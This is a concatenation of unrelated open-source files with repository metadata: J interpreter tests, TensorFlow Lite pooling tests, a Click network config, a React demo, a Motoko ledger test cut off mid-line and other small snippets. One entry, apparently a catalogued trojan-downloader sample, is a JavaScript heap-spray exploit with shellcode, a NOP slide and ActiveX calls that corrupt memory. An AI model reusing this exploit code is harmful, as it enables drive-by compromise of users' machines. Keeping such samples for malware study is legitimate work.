/. flip ('k';'k2';'v');(5 1 $ 'ab');(> 'aa';'a';'a';'b';'b');(i.5)) -: 0 : 0 +-+-------+-----+ |k|# ~. k2|{. k2| |-+-------+-----| |a|3 |aa | |-+-------+-----| |b|2 |a | +-+-------+-----+ ) (# region1 [ ('region1 region2' =: (('Region';'Region') {. (<<'joe') { ('ukey';'User') } (3!:102) '[{User:"joe", Region:""}, {User:"bob",Region:"ABC"}]'))) -: 0 (((<'User') (<'# (~. Region)') /. (3!:102) '[{User:"joe", Region:"AAA"}, {User:"joe",Region:"BBB"}, {User:"joe",Region:"CCC"}]')) -: 0 : 0 +----+-------------+ |User|# (~. Region)| |----+-------------| |joe |3 | +----+-------------+ ) (# ~. (1 3 $ 'foo')) -: 1 NB. (# ~. (3 $ 'foo')) -: 2 NB. (# ~. ('foo')) -: 2 (((<'User') (<'# (~. Region)') /. (3!:102) '[{User:"u1", Region:"AAA"}, {User:"u2",Region:"BBB"}, {User:"u3",Region:"CCC"}]')) -: 0 : 0 +----+-------------+ |User|# (~. Region)| |----+-------------| |u1 |1 | |----+-------------| |u2 |1 | |----+-------------| |u3 |1 | +----+-------------+ ) (". '1 2 3') -: 1 2 3 (+/ ('". col' / (3!:102) (<'col');(>'1';'2';'3'))) -: 6 NB. broken test (". !. 'NaN' '1 x 3') -: 1 _ 3 (<"1 ((>('abc';'123';'xyz')) & ' v')) -: 0 : 0 +-----+-----+-----+ |abc v|123 v|xyz v| +-----+-----+-----+ ) ('# k2' / flip ('k';'k2';'v');(3 1 $ 'ab');(> 'aaa';'a';'bb');(i.3)) -: 3 1 2 (%: 4) -: 2 NB. sqrt test with decimal (9!:100) 1 (%: 4) -: 2 ((9!:100) 0) -: 0 NB. i. with rank2 ($ i. (2 3) $ 2 3 4 2 3 4) -: 2 2 3 4 NB. anagram (monadic) (A. 0 1 2) -: 0 (A. 2 1 0) -: 5 (A. 3 4 0 1) -: 64 (A. (2 3) $ 0 2 1) -: 1 1 NB. ". for eval evaltest =: 3 : 0 A=. i.3 ". 'A' ) (evaltest 0) -: (i.3) NB. union table (((3!:102) (<'a');1) ,: ((3!:102) (<'a');2)) -: 0 : 0 +-+ |a| |-| |1| |-| |2| +-+ ) NB. union table (different sequence of columns) (((3!:102) ('a';'b');1;2) ,: ((3!:102) ('b';'a');4;3)) -: 0 : 0 +-+-+ |a|b| |-+-| |1|2| |-+-| |3|4| +-+-+ ) NB. aggregate table with column headers (_ ('a is +/ a';'ct is _N') /. (flip ('a';'b');(i.10);(10 $ 1 2))) -: 0 : 0 +--+--+ |a |ct| |--+--| |45|10| +--+--+ ) NB. support for for_i. ((3 : ('z=:0',LF,'for_i. (i.3) do.',LF,'z=:z,i',LF,'end.',LF,'z')) 0) -: (0,0,1,2) ((3 : ('z=:0',LF,'for_n. (i.3) do.',LF,'z=:z,n',LF,'end.',LF,'z')) 0) -: (0,0,1,2) NB. column headers (_1 { (flip ('abc';'xyx');(i.3);(1+i.3))) -: ('abc';'xyx') NB. add filter to keyTable ((<'a') ('?= a<2';'ct is _G') /. (flip ('a';'b');(i.10);(10 $ 1 2))) -: 0 : 0 +-+--+ |a|ct| |-+--| |0|1 | |-+--| |1|1 | +-+--+ ) (_ ('?= a<2';'a is +/ a';'ct is _G') /. (flip ('a';'b');(i.10);(10 $ 1 2))) -: 0 : 0 +-+--+ |a|ct| |-+--| |1|2 | +-+--+ ) NB. table results from key ((<'b') (<'(3!:102) ((''val1'';''val2'');(+/ a);(+/ a))') /. (3!:102 ('a';'b');(i.10);(10 $ 1 2))) -: 0 : 0 +-+----+----+ |b|val1|val2| |-+----+----| |1|20 |20 | |-+----+----| |2|25 |25 | +-+----+----+ ) NB. amend a column through addcol (('addcol';'a is a <. 3') } flip ((<'a');i.5)) -: 0 : 0 +-+ |a| |-| |0| |-| |1| |-| |2| |-| |3| |-| |3| +-+ ) (left('201704';4)) -: '2017' (# ;: 'abc_ 1') -: 2 (# ;: 'abc 1') -: 2 (# dedupe ('a';(3!:102) ((<'a');(1,2,1,2)))) -: 2 (# dedupe ('a';(3!:102) ((<'a');(1,1,1,2)))) -: 2 NB. test replace % $ # (_1 { sanitizeCols (flip ((<'Foo %');1))) -: (<'FooPct') NB. test collisions (_1 { sanitizeCols (flip (('Foo ';'Foo ');1;2))) -: 0 : 0 +---+----+ |Foo|Foo2| +---+----+ ) NB. filter function (# filter('a < 5';flip ((<'a');i.10))) -: 5 NB. missing value on ammend/merge ((flip (('col';'v');(>'a';'c');(1,2))) ('col';'col';'v';_1) } (flip ((<'col');>'a';'b'))) -: 0 : 0 +--+ |v | |--| |1 | |--| |-1| +--+ ) (}: 'Invoices') -: 'Invoice' NB. still broken NB. 'a';'';1 NB. (addcol ('b';'a';3!:102((<'a');i.3))) -: 0 : 0 +-+-+ |a|b| |-+-| |0|0| |-+-| |1|1| |-+-| |2|2| +-+-+ ) (ifs(((0,1,2)=1);1;0)) -: 0 1 0 (; ifs(((0,1,2)=1);'a';'b')) -: 'bab'
J
5
joebo/microj
tests.ijs
[ "MIT" ]
.row .col-sm-4 .btn-group(data-toggle="buttons")#save-granularity-toggle label.btn.btn-primary.active input(type="radio", checked=true, value="level-sessions") span(data-i18n="save_load.granularity_saved_games", title="Manage your saved games") label.btn.btn-primary input(type="radio", value="change-history") span(data-i18n="save_load.granularity_change_history", title="See your autosaved code edit history") .save-list.level-sessions ul.list-group li.list-group-item Save 001 li.list-group-item Greedy Algorithm li.list-group-item Defensive Strategy .save-list.change-history.secret ul.list-group li.list-group-item --item switches yeah-- li.list-group-item Autosaved 17:05 li.list-group-item Autosaved 14:45 li.list-group-item Autosaved 16:40 li.list-group-item Autosaved 5:05 li.list-group-item Autosaved 5:00 li.list-group-item --item switches yeah-- li.list-group-item Autosaved 4:50 li.list-group-item Autosaved 7/7/14 li.list-group-item Autosaved 7/7/14 .col-sm-8 .save-pane.level-sessions img(src="/images/pages/game-menu/save-load-stub.png") h3 Interactions: ul li On the left is a flat list of saves for this level. Click one and the stuff on the right appears. li There are name and description input boxes. Editing them auto updates the save on the left. li There are also items showing what the current equipment is, and below the current code. Neither are editable. li If you click the red box on any save, or click the delete button for the selected save, it asks for confirmation, then deletes. li Click the new save button: current code, items and empty name/description appear on the right, and a new save slot appears at the top of the list on the left, which is selected. Works like editing otherwise. .save-pane.change-history.secret img(src="/images/pages/game-menu/save-load-history-stub.png") h3 Interactions ul li Similar to WebStorm. Click ‘history’ tab in the upper left of the save/load screen to switch to this view. li Click the left row of VCS versions, and the hero, language, items and code for it shows on the right. li Click revert to set the code back to the version of the code on the left. Modal closes with the new code. li Might experiment with showing diffs with difflib. More of an interface issue than a showing-diff issue.
Jade
3
cihatislamdede/codecombat
app/templates/play/menu/save-load-view.jade
[ "CC-BY-4.0", "MIT" ]
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #include <cstdint> #include <functional> #include <memory> #include <random> #include <gtest/gtest.h> #include "tensorflow/lite/delegates/xnnpack/pool_2d_tester.h" #include "tensorflow/lite/delegates/xnnpack/xnnpack_delegate.h" namespace tflite { namespace xnnpack { TEST(AveragePool2D, UnitPoolSamePadding) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(1) .PoolingWidth(1) .StrideHeight(1) .StrideWidth(1) .SamePadding() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, UnitPoolValidPadding) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(1) .PoolingWidth(1) .StrideHeight(1) .StrideWidth(1) .ValidPadding() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, EqualPoolAndStrideWithSamePadding) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto pool_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 7), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); const int32_t pool_height = pool_rng(); const int32_t pool_width = pool_rng(); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(pool_height) .PoolingWidth(pool_width) .StrideHeight(pool_height) .StrideWidth(pool_width) .SamePadding() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, EqualPoolAndStrideWithValidPadding) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto pool_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 7), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); const int32_t pool_height = pool_rng(); const int32_t pool_width = pool_rng(); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(pool_height) .PoolingWidth(pool_width) .StrideHeight(pool_height) .StrideWidth(pool_width) .ValidPadding() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, LargePoolSmallStrideWithSamePadding) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto pool_rng = std::bind(std::uniform_int_distribution<int32_t>(4, 7), std::ref(rng)); auto stride_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 3), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(pool_rng()) .PoolingWidth(pool_rng()) .StrideHeight(stride_rng()) .StrideWidth(stride_rng()) .SamePadding() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, LargePoolSmallStrideWithValidPadding) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto pool_rng = std::bind(std::uniform_int_distribution<int32_t>(4, 7), std::ref(rng)); auto stride_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 3), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(pool_rng()) .PoolingWidth(pool_rng()) .StrideHeight(stride_rng()) .StrideWidth(stride_rng()) .ValidPadding() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, GlobalPooling) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); const int32_t height = input_rng(); const int32_t width = input_rng(); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(height) .InputWidth(width) .Channels(channel_rng()) .PoolingHeight(height) .PoolingWidth(width) .ValidPadding() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, ReluActivation) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto pool_rng = std::bind(std::uniform_int_distribution<int32_t>(3, 5), std::ref(rng)); auto stride_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 3), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(pool_rng()) .PoolingWidth(pool_rng()) .StrideHeight(stride_rng()) .StrideWidth(stride_rng()) .ReluActivation() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, Relu6Activation) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto pool_rng = std::bind(std::uniform_int_distribution<int32_t>(3, 5), std::ref(rng)); auto stride_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 3), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(pool_rng()) .PoolingWidth(pool_rng()) .StrideHeight(stride_rng()) .StrideWidth(stride_rng()) .Relu6Activation() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, ReluMinus1To1Activation) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto pool_rng = std::bind(std::uniform_int_distribution<int32_t>(3, 5), std::ref(rng)); auto stride_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 3), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(pool_rng()) .PoolingWidth(pool_rng()) .StrideHeight(stride_rng()) .StrideWidth(stride_rng()) .ReluMinus1To1Activation() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, DISABLED_TanhActivation) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto pool_rng = std::bind(std::uniform_int_distribution<int32_t>(3, 5), std::ref(rng)); auto stride_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 3), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(pool_rng()) .PoolingWidth(pool_rng()) .StrideHeight(stride_rng()) .StrideWidth(stride_rng()) .TanhActivation() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, DISABLED_SignBitActivation) { std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(nullptr), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto pool_rng = std::bind(std::uniform_int_distribution<int32_t>(3, 5), std::ref(rng)); auto stride_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 3), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(pool_rng()) .PoolingWidth(pool_rng()) .StrideHeight(stride_rng()) .StrideWidth(stride_rng()) .SignBitActivation() .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } TEST(AveragePool2D, MultiThreading) { TfLiteXNNPackDelegateOptions delegate_options = TfLiteXNNPackDelegateOptionsDefault(); delegate_options.num_threads = 2; std::unique_ptr<TfLiteDelegate, decltype(&TfLiteXNNPackDelegateDelete)> xnnpack_delegate(TfLiteXNNPackDelegateCreate(&delegate_options), TfLiteXNNPackDelegateDelete); std::random_device random_device; auto rng = std::mt19937(random_device()); auto batch_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 4), std::ref(rng)); auto input_rng = std::bind(std::uniform_int_distribution<int32_t>(10, 25), std::ref(rng)); auto pool_rng = std::bind(std::uniform_int_distribution<int32_t>(3, 5), std::ref(rng)); auto stride_rng = std::bind(std::uniform_int_distribution<int32_t>(2, 3), std::ref(rng)); auto channel_rng = std::bind(std::uniform_int_distribution<int32_t>(5, 16), std::ref(rng)); Pool2DTester() .BatchSize(batch_rng()) .InputHeight(input_rng()) .InputWidth(input_rng()) .Channels(channel_rng()) .PoolingHeight(pool_rng()) .PoolingWidth(pool_rng()) .StrideHeight(stride_rng()) .StrideWidth(stride_rng()) .Test(BuiltinOperator_AVERAGE_POOL_2D, xnnpack_delegate.get()); } } // namespace xnnpack } // namespace tflite
C++
4
yage99/tensorflow
tensorflow/lite/delegates/xnnpack/average_pool_2d_test.cc
[ "Apache-2.0" ]
interface NotMyInterface { function c(); }
ActionScript
3
Sprak1/ruffle
tests/tests/swfs/avm1/as2_oop/NotMyInterface.as
[ "Apache-2.0", "Unlicense" ]
namespace Vala { public class TestOne { public bool is_true() { return true; } } }
Vala
3
kira78/meson
test cases/vala/20 genie multiple mixed sources/vala_test_one.vala
[ "Apache-2.0" ]
| n | userQuery report: 'Try to guess my secret number between 1 and 10.'. n: random integerBetween: 1 And: 10. [(userQuery askString: 'Guess the Number.') asInteger = n] whileFalse: [ userQuery report: 'Nope. Guess again.']. userQuery report: 'You got it!'
Self
3
mullikine/RosettaCodeData
Task/Guess-the-number/Self/guess-the-number-2.self
[ "Info-ZIP" ]
\ an attempt at named locals, involves compiler magic \ \ Notes: \ \ ( ) There is a limited amount of local variable frame space, but calls can nest \ ( ) Local variables involve a function call, so they're not as cheap as global variables \ ( ) Local variable blocks CANNOT be nested within one word definition \ create name-space 8192 allot variable oldhere variable oldlast variable oldthis \ first, create some space for local stack frames create local-stack 8192 allot \ 8192 allocate value local-stack \ this is the location and size of current stack frame variable local-top local-stack local-top ! variable local-base local-stack 1024 + local-base ! variable local-count local-count off \ allocate a stack frame with indicated number of variables variable varcount : frame ( n -- ) dup varcount ! cell local-top +! \ add new frame length to stack dup local-top @ ! \ store size of the new frame cells local-base +! \ move frame pointer varcount @ 0 do local-base @ varcount @ i 1+ - cells + ! loop ; \ reclaim stack frame : unframe ( -- ) local-top @ @ \ get size of current frame cells local-base -! \ move the frame pointer cell local-top -! \ pop frame from local stack ; : *loc ( n -- a ) cells local-base @ + ; : deflocal create , [does] @ litq ['] . ,call [;] ; \ NOTE this could be further optimized by inlining the call to *loc \ but I'll leave that for another day \ \ NOTE I'm also not sure why I can't do this a prettier way. I may \ need to address implementation of create / does / etc. \ \ NOTE One reason this is so annoying is that we're compiling an \ extension to the compiler that will create compilers for \ local variables by name. I guess it's not reasonable to \ expect it to be simple. : ,local ( n a u ) header >r dup c, mem, \ deposit code for addressing a local var ( index ) postpone lit ['] litq postpone ,call ( *loc ) ['] *loc postpone litq ['] ,call postpone ,call r> 195 c, final here last - last 9 + d! 4 last 8 + c! ; : /word ( addr u -- addr' u' addr u ) dup 0 do ( addr u ) over i + c@ white? if \ found it over i + ( addr u a' ) over i - ( addr u a' u' ) rot drop ( addr a' u' ) rot i ( a' u' addr u ) unloop return then loop 2dup + -rot 0 -rot ; create namespace 128 allot variable localcount : .rsp 0 i,[ 4889e7 ] hex . cr dec ; \ make temporary dictionary space, define locals, and compile frame setup : locals ( -- ) \ move the dictionary to a temporary spot here oldhere ! last oldlast ! this oldthis ! name-space !here \ compile some local variable compilers localcount off namespace @readline trim begin ltrim dup while /word ( laddr' lu' waddr wu ) localcount @ -rot ,local 1 localcount +! repeat 2drop \ go back to compiling the function oldhere @ !here \ functions only make a local frame if they're compiled to do so localcount @ litq [c] frame ; immediate \ compile removal of the last frame : end-locals [c] unframe oldlast @ !last oldthis @ !this ; immediate
Forth
5
jephthai/EvilVM
samples/named-locals.fth
[ "MIT" ]
if(!success){ var shellcode=unescape(shellco+'%u3231'); document.write(''); var spraySlideSize=0x400000-(shellcode.length*2+0x38); var spraySlide=unescape("%u9090%u9090"); while(spraySlide.length*2<spraySlideSize){spraySlide+=spraySlide} var heapBlocks=(0x05050505-0x400000)/0x400000; var memory=new Array(); for(i=0;i<heapBlocks;i++){memory[i]=spraySlide+shellcode} var obj=document.getElementById('target').object; try{obj.open(new Array(),new Array(),new Array(),new Array(),new Array())}catch(e){} try{obj.open(new Object(),new Object(),new Object(),new Object(), new Object())}catch(e){} try{obj.setRequestHeader(new Object(),'......')}catch(e){} for(i=0;i<11;i++){try{obj.setRequestHeader(new Object(),0x12345678)}catch(e){}} }
Coq
0
fengjixuchui/Family
JS/Trojan-Downloader.JS.Agent.coq
[ "MIT" ]
// The name of this header used to be special-cased in the Clang importer. @import ctypes; @import Foundation; // no CoreFoundation in our mock SDK extern const CFStringRef kSecClass; extern const CFStringRef kSecClassGenericPassword; OSStatus SecItemCopyMatching(CFDictionaryRef query, CFTypeRef *result);
C
3
lwhsu/swift
test/Inputs/clang-importer-sdk/usr/include/SecItem.h
[ "Apache-2.0" ]
/** * Author......: See docs/credits.txt * License.....: MIT */ #ifdef KERNEL_STATIC #include "inc_vendor.h" #include "inc_types.h" #include "inc_platform.cl" #include "inc_common.cl" #endif KERNEL_FQ void m02000_mxx (KERN_ATTR_RULES ()) { } KERNEL_FQ void m02000_sxx (KERN_ATTR_RULES ()) { }
OpenCL
0
Masha/hashcat
OpenCL/m02000_a0-pure.cl
[ "MIT" ]
import * as React from 'react'; import FormLabel from '@mui/material/FormLabel'; import FormControl from '@mui/material/FormControl'; import FormGroup from '@mui/material/FormGroup'; import FormControlLabel from '@mui/material/FormControlLabel'; import FormHelperText from '@mui/material/FormHelperText'; import Switch from '@mui/material/Switch'; export default function SwitchesGroup() { const [state, setState] = React.useState({ gilad: true, jason: false, antoine: true, }); const handleChange = (event: React.ChangeEvent<HTMLInputElement>) => { setState({ ...state, [event.target.name]: event.target.checked, }); }; return ( <FormControl component="fieldset" variant="standard"> <FormLabel component="legend">Assign responsibility</FormLabel> <FormGroup> <FormControlLabel control={ <Switch checked={state.gilad} onChange={handleChange} name="gilad" /> } label="Gilad Gray" /> <FormControlLabel control={ <Switch checked={state.jason} onChange={handleChange} name="jason" /> } label="Jason Killian" /> <FormControlLabel control={ <Switch checked={state.antoine} onChange={handleChange} name="antoine" /> } label="Antoine Llorca" /> </FormGroup> <FormHelperText>Be careful</FormHelperText> </FormControl> ); }
TypeScript
4
dany-freeman/material-ui
docs/data/material/components/switches/SwitchesGroup.tsx
[ "MIT" ]
/* * This configuration count the number of packets received on one interface, it * does respond to ARP packets and is therefore L3 * * As this configuration does not send the packets it receive, it runs best if * compiled with --disable-dpdk-pool, as the internal packet pool would be * filled up by DPDK packets, the input only using Click packet to associate * them with DPDK buffer. * * A launch line would be : * sudo bin/click -c 0xf -n 4 -- conf/fastclick/receiver-l3.click */ //You do not need to change these, we send a packet with our virtual mac source before launching the pktgen so any switch can learn about us define($smac 90:e2:ba:c3:76:6e) define($srcip 192.168.128.13) //Explained in loop.click define($verbose 3) define($blocking true) //################### // TX //################### td :: ToDPDKDevice(0, BLOCKING $blocking, VERBOSE $verbose) //################### // RX //################### fd0 :: FromDPDKDevice(0, PROMISC true, VERBOSE $verbose) -> arp_c :: Classifier(12/0800, 12/0806 20/0001, 12/0806 20/0002, -) arp_c[0] -> oc0 :: AverageCounter() -> Discard arp_c[1] -> Print("ARP QUERY") -> arp_r :: ARPResponder($srcip $smac) -> Print("OUR RESP") -> td arp_c[2] -> Print("ARP RESP") -> Discard arp_c[3] -> Print("OTHER") -> Discard Script( TYPE ACTIVE, label start, wait 1s, print "Number of packets received : $(oc0.count)", print "RX link rate : $(oc0.link_rate)", write oc0.reset, goto start )
Click
4
BorisPis/asplos22-nicmem-fastclick
conf/pktgen/receiver-l3.click
[ "BSD-3-Clause-Clear" ]
redo-ifchange $1.c echo c-to-c cat $1.c ../sleep 1.3
Stata
2
BlameJohnny/redo
t/120-defaults-flat/default.c.do
[ "Apache-2.0" ]
import Ledger "canister:ledger"; import Prim "mo:prim" /* /nix/store/62mpdxszlrj5j2048pjdmm4b6ls3xc6y-moc/bin/moc -o transaction_ledger_correctness.wasm transaction_ledger_correctness.mo --actor-alias ledger "ryjl3-tyaaa-aaaaa-aaaba-cai" --actor-idl . /nix/store/62mpdxszlrj5j2048pjdmm4b6ls3xc6y-moc/bin/moc --idl -o transaction_ledger_correctness.did transaction_ledger_correctness.mo --actor-alias ledger "ryjl3-tyaaa-aaaaa-aaaba-cai" --actor-idl . && cat transaction_ledger_correctness.did */ actor Self { let nothing : Ledger.ICP = { e8s = 0 }; let fee : Ledger.ICP = { e8s = 10000 }; func balanceArgs(owner : Ledger.Address) : Ledger.AccountBalanceArgs = { account = owner }; public func check_and_send(accnt : Ledger.Address, iHave : Ledger.ICP, to : Ledger.Address, toHas : Ledger.ICP, amount : Ledger.ICP) : async ?Ledger.BlockHeight { Prim.debugPrint(debug_show accnt); Prim.debugPrint(debug_show to); // verify that I have the right amount of funds let funds = await Ledger.account_balance(balanceArgs accnt); Prim.debugPrint("ASSERTING: " # debug_show iHave # ", " # debug_show funds); assert iHave == funds; if (accnt != to) { // verify that other side has the right amount of funds let otherFunds = await Ledger.account_balance(balanceArgs to); Prim.debugPrint("ASSERTING2: " # debug_show toHas # " == " # debug_show otherFunds); assert toHas == otherFunds; }; try { Prim.debugPrint("TRANSFERRING: " # debug_show amount # ", " # debug_show (Prim.principalOfActor Self) # ", TO: " # debug_show to); let res = await Ledger.transfer({ memo = 42; amount = amount; fee = fee; from_subaccount = null; to = to; created_at_time = null }); switch (res) { case 